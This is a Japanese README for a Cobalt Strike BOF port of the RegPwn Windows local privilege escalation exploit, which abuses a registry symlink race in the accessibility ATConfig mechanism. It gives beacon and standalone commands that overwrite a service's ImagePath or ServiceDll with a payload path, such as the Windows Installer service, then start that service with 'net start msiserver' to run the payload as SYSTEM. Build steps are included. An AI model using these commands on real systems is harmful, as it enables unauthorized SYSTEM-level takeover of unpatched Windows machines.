
Cobalt Strike BOF ポート - Filip Dragovic (@Wh04m1001) / MDSec ActiveBreach による RegPwn エクスプロイトのポート。
これは、元の C# エクスプロイトの雑な BOF 再実装です。脆弱性の調査とエクスプロイトに対するすべての功績は Filip Dragovic と MDSec に帰属します。
Windows のアクセシビリティ ATConfig メカニズムのレジストリシンボリックリンク競合状態を悪用し、通常のユーザーコンテキストから保護された HKLM レジストリキーに任意の値を書き込みます(ローカル特権昇格)。
Windows 11 25H2/24H2、Windows 10 21H2、および 2026 年 3 月のパッチ適用前の Windows Server 2016/2019/2022 を対象としています。
警告: このエクスプロイトは、競合状態の一部としてワークステーションをロックします。
msiserver (Windows インストーラー) サービスの ImagePath。このサービスは SYSTEM として実行され、通常ユーザーが起動できます。
Script Manager で regpwn.cna をロードし、次に実行:
beacon> regpwn "cmd.exe /c C:\Programdata\payload.exe"
beacon> regpwn C:\payload.exe SYSTEM\CurrentControlSet\Services\msiserver ImagePath
beacon> regpwn C:\evil.dll SYSTEM\CurrentControlSet\Services\SomeService\Parameters ServiceDll
regpwn.x64.exe "cmd.exe /c C:\Programdata\payload.exe"
regpwn.x64.exe C:\payload.exe SYSTEM\CurrentControlSet\Services\OtherService ImagePath
エクスプロイトが成功した後、サービスを起動して SYSTEM として実行:
net start msiserver
x86_64-w64-mingw32-gcc(MinGW-w64 クロスコンパイラ)が必要です。
make # build BOF (regpwn.x64.o)
make test # build standalone EXE (regpwn.x64.exe)
make clean
x64 のみ。